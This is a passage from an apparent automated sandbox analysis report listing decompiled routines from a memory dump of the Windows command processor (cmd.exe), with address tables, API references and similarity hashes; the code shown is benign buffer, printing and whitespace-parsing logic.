                                    0x011f8436
                                    0x011f8440
                                    0x011f8464
                                    0x011f8442
                                    0x011f845e
                                    0x011f845e
                                    0x011f8466
                                    0x011f8477
                                    0x011f8484
                                    0x011f8493
                                    0x011f84c8
                                    0x011f8495
                                    0x011f849d
                                    0x011f84aa
                                    0x011f84b4
                                    0x011f84c5
                                    0x011f84c5
                                    0x011f84d0

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F8459
                                    • printf.MSVCRT ref: 011F84B4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                    • String ID: %3d
                                    • API String ID: 2845598586-2138283368
                                    • Opcode ID: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                    • Instruction ID: 6f424aa0bbd4063a4a801d53f52ded861282c6af39b1cd7a6efb9a8359747c55
                                    • Opcode Fuzzy Hash: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                    • Instruction Fuzzy Hash: C3012DB1650105BFFB286BA59C89FEB3EEDDBA5BA4F00401CFB0855080D7B19850C2B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E011E0C70(void* __ecx, int _a4) {
				void* _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t35 = __ecx;
				_t34 = _a4;
				_t39 = _t34 -  *((intOrPtr*)(__ecx + 0x210));
				if(_t34 <=  *((intOrPtr*)(__ecx + 0x210))) {
					L6:
					return 0;
				}
				_push(0x11d262a);
				_t24 = E011E72B5(_t23, _t34, __ecx, _t39,  ~(0 | _t39 > 0x00000000) | _t34 * 0x00000002);
				_t37 = _t36 + 8;
				if(_t24 == 0) {
					E011F292C("onecore\\base\\cmd\\maxpathawarestring.cpp", 0x8007000e);
					return 0x8007000e;
				}
				_t20 =  *(_t35 + 0x208);
				if(_t24 != _t20) {
					__imp__??_V@YAXPAX@Z(_t20);
					_t37 = _t37 + 4;
					 *(_t35 + 0x208) = _t24;
				}
				_t21 =  *(_t35 + 0x208);
				 *(_t35 + 0x210) = _t34;
				if(_t21 == 0) {
					_t21 = _t35;
				}
				memset(_t21, 0, _t34);
				goto L6;
			}
















                                    0x011e0c77
                                    0x011e0c7a
                                    0x011e0c7d
                                    0x011e0c83
                                    0x011e0ce5
                                    0x00000000
                                    0x011e0ce5
                                    0x011e0c90
                                    0x011e0ca2
                                    0x011e0ca4
                                    0x011e0ca9
                                    0x011ecd56
                                    0x00000000
                                    0x011ecd5b
                                    0x011e0caf
                                    0x011e0cb7
                                    0x011e0cba
                                    0x011e0cc0
                                    0x011e0cc3
                                    0x011e0cc3
                                    0x011e0cc9
                                    0x011e0ccf
                                    0x011e0cd7
                                    0x011e0cee
                                    0x011e0cee
                                    0x011e0cdd
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E72B5: __EH_prolog3_catch.LIBCMT ref: 011E7650
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                    • memset.MSVCRT ref: 011E0CDD
                                    Strings
                                    • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 011ECD51
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: H_prolog3_catchmemset
                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                    • API String ID: 620422817-3416068913
                                    • Opcode ID: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                    • Instruction ID: e158b470713e9f8187c53dfda88aa9db20da53aef0ddbfa8dd8e52c343665afc
                                    • Opcode Fuzzy Hash: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                    • Instruction Fuzzy Hash: 7A01D871300705ABE72C86F99C8DB6BB6D9EB94250F04053DF556D7240DBF6EC51C2A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DDEF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011DDEF9(signed short* __ecx) {
				long _t9;
				signed short* _t11;

				_t11 = __ecx;
				if(__ecx != 0) {
					while(1) {
						_t9 =  *_t11 & 0x0000ffff;
						if(iswspace(_t9) != 0) {
							goto L6;
						}
						L3:
						if(wcschr(L"=,;", _t9) != 0) {
							if(_t9 == 0) {
								goto L4;
							} else {
								L7:
								_t11 =  &(_t11[1]);
								continue;
							}
							L10:
						}
						L4:
						goto L5;
						L6:
						if(_t9 == 0xa) {
							goto L3;
						} else {
							goto L7;
						}
						goto L5;
					}
				}
				L5:
				return _t11;
				goto L10;
			}





                                    0x011ddefc
                                    0x011ddf00
                                    0x011ddf03
                                    0x011ddf03
                                    0x011ddf10
                                    0x00000000
                                    0x00000000
                                    0x011ddf12
                                    0x011ddf22
                                    0x011ddf36
                                    0x00000000
                                    0x011ddf38
                                    0x011ddf2e
                                    0x011ddf2e
                                    0x00000000
                                    0x011ddf2e
                                    0x00000000
                                    0x011ddf36
                                    0x011ddf24
                                    0x00000000
                                    0x011ddf29
                                    0x011ddf2c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ddf2c
                                    0x011ddf03
                                    0x011ddf25
                                    0x011ddf28
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswspacewcschr
                                    • String ID: =,;
                                    • API String ID: 287713880-1539845467
                                    • Opcode ID: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                    • Instruction ID: db932e6896e5513591f390be794c8b091ebc46a050c7d1fd813f3b29e87dfa73
                                    • Opcode Fuzzy Hash: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                    • Instruction Fuzzy Hash: D3E04F37608522925F3D0BDEB9599779ED9CAE6A2531B01AFF900D31C0EB6188438293
                                    Uniqueness

                                    Uniqueness Score: -1.00%